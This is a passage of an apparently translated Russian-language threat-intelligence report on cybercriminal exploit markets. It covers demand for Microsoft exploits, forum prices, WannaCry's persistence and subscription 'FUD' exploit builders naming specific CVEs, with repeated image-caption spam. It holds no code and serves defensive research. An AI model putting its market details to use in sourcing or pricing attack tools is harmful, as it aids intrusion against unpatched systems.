Как ΡƒΠΆΠ΅ Π±Ρ‹Π»ΠΎ сказано Π²Ρ‹ΡˆΠ΅, самыми вострСбованными (47%) оказались эксплойты для ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ² Microsoft. Эксплойты для устройств ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚Π° Π²Π΅Ρ‰Π΅ΠΉ (IoT) искали лишь 5% ΠΏΠΎΠΊΡƒΠΏΠ°Ρ‚Π΅Π»Π΅ΠΉ, ΠΎΠ΄Π½Π°ΠΊΠΎ ΠΌΡ‹ ΠΎΠΆΠΈΠ΄Π°Π΅ΠΌ, Ρ‡Ρ‚ΠΎ с ростом количСства ΠΏΠΎΠ΄ΠΊΠ»ΡŽΡ‡Ρ‘Π½Π½Ρ‹Ρ… устройств этот сСгмСнт станСт Π±ΠΎΠ»Π΅Π΅ ΠΏΡ€ΠΈΠ±Ρ‹Π»ΡŒΠ½Ρ‹ΠΌ для Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΎΠ², особСнно с ΡƒΡ‡Ρ‘Ρ‚ΠΎΠΌ Ρ‚ΠΎΠ³ΠΎ, Ρ‡Ρ‚ΠΎ ΠΌΠ½ΠΎΠ³ΠΈΠ΅ IoT-устройства с Ρ‚Ρ€ΡƒΠ΄ΠΎΠΌ ΠΏΠΎΠ΄Π΄Π°ΡŽΡ‚ΡΡ ΠΈΡΠΏΡ€Π°Π²Π»Π΅Π½ΠΈΡŽ, Π° Π½Π° Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Ρ… установка ΠΎΠ±Π½ΠΎΠ²Π»Π΅Π½ΠΈΠΉ Π½Π΅ прСдусмотрСна Π² ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏΠ΅.

Π›ΠΈΠ΄Π΅Ρ€ΠΎΠΌ срСди выставлСнных Π½Π° ΠΏΡ€ΠΎΠ΄Π°ΠΆΡƒ эксплойтов Ρ‚Π°ΠΊΠΆΠ΅ ΡΠ²Π»ΡΡŽΡ‚ΡΡ ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚Ρ‹ Microsoft: Microsoft Office, Microsoft Windows, Internet Explorer ΠΈ Microsoft Remote Desktop Protocol (RDP) ΠΈΠΌΠ΅Π»ΠΈ ΡΠΎΠ²ΠΎΠΊΡƒΠΏΠ½ΡƒΡŽ долю Ρ€Ρ‹Π½ΠΊΠ° 61%.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ‚ΠΎΠΌΠŸΡ€Π΅Π΄Π»Π°Π³Π°Π΅ΠΌΡ‹Π΅ ΠΊ ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ΅ эксплойты

БрСдняя Ρ†Π΅Π½Π°, ΠΊΠΎΡ‚ΠΎΡ€ΡƒΡŽ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ Π±Ρ‹Π»ΠΈ Π³ΠΎΡ‚ΠΎΠ²Ρ‹ Π·Π°ΠΏΠ»Π°Ρ‚ΠΈΡ‚ΡŒ Π·Π° эксплойты, составила 2 тыс. Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША. Но ΠΌΡ‹ нашли Π² ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ΅ Π½Π° русскоязычных Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… нСсколько ΠΎΡ‚Π½ΠΎΡΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π±ΡŽΠ΄ΠΆΠ΅Ρ‚Π½Ρ‹Ρ… эксплойтов:

для Microsoft RDP β€” 200 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША,

для WinRAR β€” 200 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША;

для Cisco β€” 1000 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША.

На англоязычных Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… Ρ†Π΅Π½Ρ‹ Π±Ρ‹Π»ΠΈ Π΅Ρ‰Ρ‘ Π½ΠΈΠΆΠ΅: Π½Π΅ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ эксплойты для Microsoft Word ΠΈ Excel стоили всСго 35 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША.

Π’ ΠΎΡ‚Π»ΠΈΡ‡ΠΈΠ΅ ΠΎΡ‚ англоязычных Ρ„ΠΎΡ€ΡƒΠΌΠΎΠ², Π³Π΄Π΅ Ρ‡Π°Ρ‰Π΅ всСго Ρ€Π΅ΠΊΠ»Π°ΠΌΠΈΡ€ΠΎΠ²Π°Π»ΠΈΡΡŒ эксплойты для Microsoft Office ΠΈ Adobe Acrobat Reader, Ρ€Π°Π·Π½ΠΎΠΎΠ±Ρ€Π°Π·ΠΈΠ΅ эксплойтов Π½Π° русскоязычных Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… Π±Ρ‹Π»ΠΎ Π·Π½Π°Ρ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π²Ρ‹ΡˆΠ΅. НаибольшСй ΠΏΠΎΠΏΡƒΠ»ΡΡ€Π½ΠΎΡΡ‚ΡŒΡŽ пользовались Β«Ρ‚ΠΈΡ…ΠΈΠ΅Β» эксплойты, ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Π½Ρ‹Π΅ для скрытного запуска Π² Ρ„ΠΎΠ½ΠΎΠ²ΠΎΠΌ Ρ€Π΅ΠΆΠΈΠΌΠ΅ ΠΏΡ€ΠΈ ΠΎΡ‚ΠΊΡ€Ρ‹Ρ‚ΠΈΠΈ Ρ„Π°ΠΉΠ»Π°, содСрТащСго эксплойт, ΠΈ автоматичСской установки врСдоносного ПО Π±Π΅Π· Π²Π΅Π΄ΠΎΠΌΠ° ΠΆΠ΅Ρ€Ρ‚Π²Ρ‹. Π’ ΠΈΠ΄Π΅Π°Π»Π΅ ΠΎΠ½ΠΈ ΡΠΎΠ²Π΅Ρ€ΡˆΠ΅Π½Π½ΠΎ Π½Π΅ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠΌΡ‹ Π²ΠΎ врСмя выполнСния ΠΈ для антивирусных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ.

ΠœΡ‹ Ρ‚Π°ΠΊΠΆΠ΅ прослСдили, ΠΊΠ°ΠΊ список ΠΏΠΎΠΆΠ΅Π»Π°Π½ΠΈΠΉ ΠΏΠΎΡ‚Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½Ρ‹Ρ… ΠΏΠΎΠΊΡƒΠΏΠ°Ρ‚Π΅Π»Π΅ΠΉ соотносится с Ρ€Π΅Π°Π»ΡŒΠ½Ρ‹ΠΌΠΈ объявлСниями ΠΎ ΠΏΡ€ΠΎΠ΄Π°ΠΆΠ΅ эксплойтов для ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ² Microsoft Π½Π° ΠΏΠΎΠ΄ΠΏΠΎΠ»ΡŒΠ½Ρ‹Ρ… Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ… кибСрпрСступников. ΠœΡ‹ Π·Π°ΠΌΠ΅Ρ‚ΠΈΠ»ΠΈ, Ρ‡Ρ‚ΠΎ Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ Π·Π°ΠΏΡ€Π°ΡˆΠΈΠ²Π°Π»ΠΎΡΡŒ, Π±Ρ‹Π»ΠΎ Π±ΠΎΠ»Π΅Π΅ ΠΈΠ»ΠΈ ΠΌΠ΅Π½Π΅Π΅ ΠΏΠΎΡ…ΠΎΠΆΠ΅ Π½Π° Ρ‚ΠΎ, Ρ‡Ρ‚ΠΎ ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π»ΠΎΡΡŒ, β€”ΠΏΡ€Π΅Π΄Π»ΠΎΠΆΠ΅Π½ΠΈΠ΅ Π°Π΄Π°ΠΏΡ‚ΠΈΡ€ΠΎΠ²Π°Π»ΠΎΡΡŒ ΠΊ Ρ‚ΠΎΠΌΡƒ, Ρ‡Ρ‚ΠΎ Ρ‚Ρ€Π΅Π±ΠΎΠ²Π°Π»ΠΈ ΠΏΠΎΡ‚Ρ€Π΅Π±ΠΈΡ‚Π΅Π»ΠΈ.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитомБравнСниС спроса ΠΈ прСдлоТСния Π½Π° эксплойты для ΠΏΡ€ΠΎΠ΄ΡƒΠΊΡ‚ΠΎΠ² Microsoft

Cпрос Π½Π° эксплойты ΠΈ ΠΈΡ… Π΄ΠΎΡΡ‚ΡƒΠΏΠ½ΠΎΡΡ‚ΡŒ для ΠΏΠΎΠΊΡƒΠΏΠΊΠΈ высоки, ΠΏΠΎΠΊΠ° ΠΎΠ½ΠΈ ΠΎΡ‚Π½ΠΎΡΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ Π½ΠΎΠ²Ρ‹Π΅. Π§ΡƒΡ‚ΡŒ мСньшС ΠΏΠΎΠ»ΠΎΠ²ΠΈΠ½Ρ‹ эксплойтов, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΈΡ‰ΡƒΡ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ ΠΊΠΈΠ±Π΅Ρ€Ρ„ΠΎΡ€ΡƒΠΌΠΎΠ², ΠΈ Ρ‡ΡƒΡ‚ΡŒ большС ΠΏΠΎΠ»ΠΎΠ²ΠΈΠ½Ρ‹ ΠΏΡ€ΠΎΠ΄Π°Π½Π½Ρ‹Ρ… ΠΈΠΌΠΈ Π±Ρ‹Π»ΠΈ ΠΏΡ€Π΅Π΄Π½Π°Π·Π½Π°Ρ‡Π΅Π½Ρ‹ для уязвимостСй, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π±Ρ‹Π»ΠΈ раскрыты Π² 2019 ΠΈ 2020 Π³ΠΎΠ΄Π°Ρ…. Π‘ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²ΠΎ эксплойтов N-day, Ρ€Π΅ΠΊΠ»Π°ΠΌΠΈΡ€ΡƒΠ΅ΠΌΡ‹Ρ… Π½Π° англоязычных Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ…, относятся ΠΊ 2017 ΠΈΠ»ΠΈ 2018 Π³ΠΎΠ΄Π°Ρ…, Π° Ρ‚Π΅, Ρ‡Ρ‚ΠΎ Ρ€Π΅ΠΊΠ»Π°ΠΌΠΈΡ€ΡƒΡŽΡ‚ΡΡ Π½Π° русскоязычных Ρ„ΠΎΡ€ΡƒΠΌΠ°Ρ…, Π² основном Π³ΠΎΠ΄ΠΈΡ‡Π½ΠΎΠΉ давности.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитомРаспрСдСлСниС ΠΏΠΎ Π³ΠΎΠ΄Π°ΠΌ эксплойтов, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΈΡ‰ΡƒΡ‚ ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»ΠΈ ΠΊΠΈΠ±Π΅Ρ€Ρ„ΠΎΡ€ΡƒΠΌΠΎΠ²

Π£ΡΡ‚Π°Ρ€Π΅Π²ΡˆΠΈΠΉ Π½Π΅ Π·Π½Π°Ρ‡ΠΈΡ‚ бСсполСзный

Как Π½ΠΈ ΡƒΠ΄ΠΈΠ²ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ, эксплойты для самых старых уязвимостСй ΠΏΡ€ΠΎΠ΄ΠΎΠ»ΠΆΠ°ΡŽΡ‚ ΠΏΡ€ΠΎΠ΄Π°Π²Π°Ρ‚ΡŒΡΡ. ΠšΠΈΠ±Π΅Ρ€ΠΏΡ€Π΅ΡΡ‚ΡƒΠΏΠ½ΠΈΠΊΠΈ хотят ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ самый Π΄Π΅ΡˆΡ‘Π²Ρ‹ΠΉ инструмСнт, ΠΈ Π² Π±ΠΎΠ»ΡŒΡˆΠΈΠ½ΡΡ‚Π²Π΅ случаСв использованиС уязвимостСй Π½ΡƒΠ»Π΅Π²ΠΎΠ³ΠΎ дня ΠΈΠ»ΠΈ Π½Π΅Π΄Π°Π²Π½ΠΎ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½Ρ‹Ρ… являСтся бСссмыслСнной Ρ€ΠΎΡΠΊΠΎΡˆΡŒΡŽ. Π’ связи с этим ΠΎΠ½ΠΈ ΠΎΠ±Ρ€Π°Ρ‰Π°ΡŽΡ‚ΡΡ ΠΊ Π±ΠΎΠ»Π΅Π΅ ΡƒΡΡ‚Π°Ρ€Π΅Π²ΡˆΠΈΠΌ уязвимостям, Π² Ρ‚ΠΎΠΌ числС дСсятилСтнСй давности. Эксплойты для уязвимостСй, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ Π±Ρ‹Π»ΠΈ исправлСны Π² Ρ‚Π΅Ρ‡Π΅Π½ΠΈΠ΅ ΠΌΠ½ΠΎΠ³ΠΈΡ… Π»Π΅Ρ‚, ΠΏΡ€ΠΎΠ΄Π°ΡŽΡ‚ΡΡ ΠΏΠΎ Π΄Π΅ΡˆΡ‘Π²ΠΊΠ΅, Ρ‡Ρ‚ΠΎ позволяСт Π·Π½Π°Ρ‡ΠΈΡ‚Π΅Π»ΡŒΠ½ΠΎ ΡΠ½ΠΈΠ·ΠΈΡ‚ΡŒ расходы Π½Π° ΠΏΠΎΠ΄Π³ΠΎΡ‚ΠΎΠ²ΠΊΡƒ ΠΊΠ°ΠΌΠΏΠ°Π½ΠΈΠΈ.

НапримСр, Π²Π°Ρ€ΠΈΠ°Π½Ρ‚Ρ‹ ΠΎΡ€ΠΈΠ³ΠΈΠ½Π°Π»ΡŒΠ½ΠΎΠΉ ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΡ‹ WannaCry ransomware распространСны ΠΈ сСгодня. WannaCry опираСтся Π½Π° EternalBlue, эксплойт для CVE-2017-0144. Компания Microsoft выпустила исправлСниС для этой уязвимости Π² Π±ΡŽΠ»Π»Π΅Ρ‚Π΅Π½Π΅ бСзопасности MS17-010 ΠΏΡ€ΠΈΠΌΠ΅Ρ€Π½ΠΎ Π·Π° Π΄Π²Π° мСсяца Π΄ΠΎ ΠΏΠ΅Ρ€Π²ΠΎΠΉ Π²ΡΠΏΡ‹ΡˆΠΊΠΈ эпидСмии Π²Ρ‹ΠΌΠΎΠ³Π°Ρ‚Π΅Π»ΡŒΡΠΊΠΎΠ³ΠΎ ПО Π² ΠΌΠ°Π΅ 2017 Π³ΠΎΠ΄Π°. Учитывая, Ρ‡Ρ‚ΠΎ ΡƒΡΠ·Π²ΠΈΠΌΠΎΡΡ‚ΡŒ Π±Ρ‹Π»Π° исправлСна, Π²ΡΠΏΡ‹ΡˆΠΊΠ° Π½Π΅ Π΄ΠΎΠ»ΠΆΠ½Π° Π±Ρ‹Π»Π° Π·Π°Ρ‚Ρ€ΠΎΠ½ΡƒΡ‚ΡŒ ΠΌΠ½ΠΎΠ³ΠΎ устройств. Однако ΠΏΠΎ Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹ΠΌ ΠΏΡ€ΠΈΡ‡ΠΈΠ½Π°ΠΌ ΠΌΠ½ΠΎΠ³ΠΈΠ΅ ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΈ Π½Π΅ ΠΏΡ€ΠΈΠΌΠ΅Π½ΠΈΠ»ΠΈ ΠΏΠ°Ρ‚Ρ‡ Π΄ΠΎ сих ΠΏΠΎΡ€.

Как отмСчаСтся Π² Π΅ΠΆΠ΅Π³ΠΎΠ΄Π½ΠΎΠΌ ΠΎΡ‚Ρ‡Ρ‘Ρ‚Π΅ Trend Micro ΠΏΠΎ кибСрбСзопасности, WannaCry Π±Ρ‹Π» самым ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½Ρ‹ΠΌ сСмСйством врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ Π² 2020 Π³ΠΎΠ΄Ρƒ. А согласно Π΄Π°Π½Π½Ρ‹ΠΌ Shodan, ΠΏΠΎ ΡΠΎΡΡ‚ΠΎΡΠ½ΠΈΡŽ Π½Π° июнь 2021 Π³ΠΎΠ΄Π° Π² сСти всё Π΅Ρ‰Ρ‘ присутствуСт Π±ΠΎΠ»Π΅Π΅ 650 тыс. устройств, уязвимых ΠΊ WannaCry.

Уязвимости ΠΏΠΎ подпискС

Π”ΠΎΡ…ΠΎΠ΄Π½ΠΎΡΡ‚ΡŒ подписной ΠΌΠΎΠ΄Π΅Π»ΠΈ ΠΎΡ†Π΅Π½ΠΈΠ»ΠΈ Π½Π΅ Ρ‚ΠΎΠ»ΡŒΠΊΠΎ Π²Π΅Π½Π΄ΠΎΡ€Ρ‹ ПО, Π½ΠΎ ΠΈ кибСрпрСступники, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€Π΅Π΄Π»Π°Π³Π°ΡŽΡ‚ подписку Π½Π° свСТиС эксплойты Π·Π° Π΅ΠΆΠ΅ΠΌΠ΅ΡΡΡ‡Π½ΡƒΡŽ ΠΏΠ»Π°Ρ‚Ρƒ Π² Ρ€Π°Π·ΠΌΠ΅Ρ€Π΅ ΠΎΡ‚ 60 Π΄ΠΎ 2000 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ ΡΠΊΡΠΏΠ»ΠΎΠΈΡ‚ΠΎΠΌΠŸΡ€Π°ΠΉΡ-лист Π½Π° эксплойт-подписку

Один ΠΈΠ· Ρ‚Π°ΠΊΠΈΡ… ΠΏΡ€ΠΎΠ΄Π°Π²Ρ†ΠΎΠ² ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π» ΠΌΠ΅ΡΡΡ‡Π½ΡƒΡŽ подписку Π½Π° сборщик эксплойтов ΠΏΠΎ Ρ†Π΅Π½Π΅ ΠΎΡ‚ 60 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША. БСрвис ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π» нСсколько ΠΊΠ°Ρ‚Π΅Π³ΠΎΡ€ΠΈΠΉ эксплойтов, Π²ΠΊΠ»ΡŽΡ‡Π°Ρ эксплойты для Microsoft Word, Microsoft Excel ΠΈ JavaScript, ΠΈ Π³Π°Ρ€Π°Π½Ρ‚ΠΈΡ€ΠΎΠ²Π°Π», Ρ‡Ρ‚ΠΎ эксплойты ΡΠ²Π»ΡΡŽΡ‚ΡΡ Β«FUDΒ» (Full UnDetectable β€” ΠΏΠΎΠ»Π½ΠΎΡΡ‚ΡŒΡŽ Π½Π΅ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠΈΠ²Π°Π΅ΠΌΡ‹ΠΌΠΈ) ΠΈ Π±ΡƒΠ΄ΡƒΡ‚ ΠΎΠ±Π½ΠΎΠ²Π»ΡΡ‚ΡŒΡΡ СТСнСдСльно. ΠŸΠΎΠ΄ΠΏΠΈΡΡ‡ΠΈΠΊ ΠΌΠΎΠ³ Π²Ρ‹Π±Ρ€Π°Ρ‚ΡŒ, ΠΊΠ°ΠΊΠΈΠ΅ эксплойты ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ для Ρ„Π°ΠΉΠ»Π°, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΎΠ½ Ρ…ΠΎΡ‚Π΅Π» Π±Ρ‹ ΠΈΡΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚ΡŒ Π² качСствС ΠΏΠΎΠ»Π΅Π·Π½ΠΎΠΉ Π½Π°Π³Ρ€ΡƒΠ·ΠΊΠΈ.

Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ Ρ„ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π‘ΠΌΠΎΡ‚Ρ€Π΅Ρ‚ΡŒ ΠΊΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΡƒ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. ΠšΠ°Ρ€Ρ‚ΠΈΠ½ΠΊΠ° ΠΏΡ€ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитом. Π€ΠΎΡ‚ΠΎ Π§Ρ‚ΠΎ ΠΏΠΎΠ½ΠΈΠΌΠ°ΡŽΡ‚ ΠΏΠΎΠ΄ эксплоитомЭксплойт Π±ΠΈΠ»Π΄Π΅Ρ€ β€” конструктор врСдоносного ПО ΠΏΠΎ подпискС

Π”Ρ€ΡƒΠ³ΠΎΠΉ ΠΏΡ€ΠΎΠ΄Π°Π²Π΅Ρ† ΠΏΡ€Π΅Π΄Π»Π°Π³Π°Π» Π·Π° 1150 Π΄ΠΎΠ»Π»Π°Ρ€ΠΎΠ² БША Π² мСсяц конструктор врСдоносного ПО, Π²ΠΊΠ»ΡŽΡ‡Π°ΡŽΡ‰ΠΈΠΉ эксплойты для CVE-2017-11882, CVE-2017-8570 ΠΈ CVE-2018-0802, с Π°Π½Π°Π»ΠΎΠ³ΠΈΡ‡Π½Ρ‹ΠΌΠΈ гарантиями нСобнаруТСния Π²ΠΎ врСмя выполнСния ΠΈ СТСмСсячными обновлСниями.

Π­Ρ‚ΠΈ услуги ΠΏΠΎ подпискС ΠΎΠ±Π΅ΡΠΏΠ΅Ρ‡ΠΈΠ²Π°ΡŽΡ‚ быстрый доступ для ΠΌΠ΅Π½Π΅Π΅ ΠΈΡΠΊΡƒΡˆΡ‘Π½Π½Ρ‹Ρ… ΠΏΠΎΠ»ΡŒΠ·ΠΎΠ²Π°Ρ‚Π΅Π»Π΅ΠΉ, ΠΏΠΎΡΠΊΠΎΠ»ΡŒΠΊΡƒ большая Ρ‡Π°ΡΡ‚ΡŒ Ρ€Π°Π±ΠΎΡ‚Ρ‹ ΡƒΠΆΠ΅ Π°Π²Ρ‚ΠΎΠΌΠ°Ρ‚ΠΈΠ·ΠΈΡ€ΠΎΠ²Π°Π½Π° для Π½ΠΈΡ…, Ρ‡Ρ‚ΠΎ сниТаСт Π±Π°Ρ€ΡŒΠ΅Ρ€ для Π²Ρ…ΠΎΠ΄Π° Π² ΠΊΠΈΠ±Π΅Ρ€ΠΏΡ€Π΅ΡΡ‚ΡƒΠΏΠ½ΠΎΡΡ‚ΡŒ. ΠšΠ»ΠΈΠ΅Π½Ρ‚Ρ‹, ΠΏΠΎΡ…ΠΎΠΆΠ΅, Π΄ΠΎΠ²ΠΎΠ»ΡŒΠ½Ρ‹ услугами, Π½ΠΎ ΠΎΠ½ΠΈ, ΠΏΠΎΡ…ΠΎΠΆΠ΅, Π½Π΅ Π·Π½Π°ΡŽΡ‚, Ρ‡Ρ‚ΠΎ Π΄Π΅Π»Π°ΡŽΡ‚ ΠΏΡ€ΠΎΠ΄Π°Π²Ρ†Ρ‹ услуг, Ρ‡Ρ‚ΠΎΠ±Ρ‹ ΠΊΠ°ΠΆΠ΄Ρ‹ΠΉ мСсяц ΠΎΡΡ‚Π°Π²Π»ΡΡ‚ΡŒ эксплойты Π½Π΅ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½Π½Ρ‹ΠΌΠΈ.

Π’Ρ‹Π²ΠΎΠ΄Ρ‹ ΠΈ Ρ€Π΅ΠΊΠΎΠΌΠ΅Π½Π΄Π°Ρ†ΠΈΠΈ

Одной ΠΈΠ· Ρ‚Π΅Π½Π΄Π΅Π½Ρ†ΠΈΠΉ, которая ΠΌΠΎΠΆΠ΅Ρ‚ ΠΎΠΏΡ€Π΅Π΄Π΅Π»ΠΈΡ‚ΡŒ Π±ΡƒΠ΄ΡƒΡ‰Π΅Π΅ Ρ€Ρ‹Π½ΠΊΠ° эксплойтов, являСтся рост распространённости ΠΌΠΎΠ΄Π΅Π»ΠΈ «доступ ΠΊΠ°ΠΊ услуга», Π² Ρ€Π°ΠΌΠΊΠ°Ρ… ΠΊΠΎΡ‚ΠΎΡ€ΠΎΠΉ Β«Π°Π±ΠΎΠ½Π΅Π½Ρ‚Ρ‹Β» ΠΏΠΎΠ»ΡƒΡ‡Π°ΡŽΡ‚ Π½Π΅Π»Π΅Π³Π°Π»ΡŒΠ½Ρ‹ΠΉ доступ ΠΊ ΠΊΠΎΡ€ΠΏΠΎΡ€Π°Ρ‚ΠΈΠ²Π½Ρ‹ΠΌ сСтям Ρ‡Π΅Ρ€Π΅Π· RDP. Π­Ρ‚ΠΎ Π΄Π°Ρ‘Ρ‚ 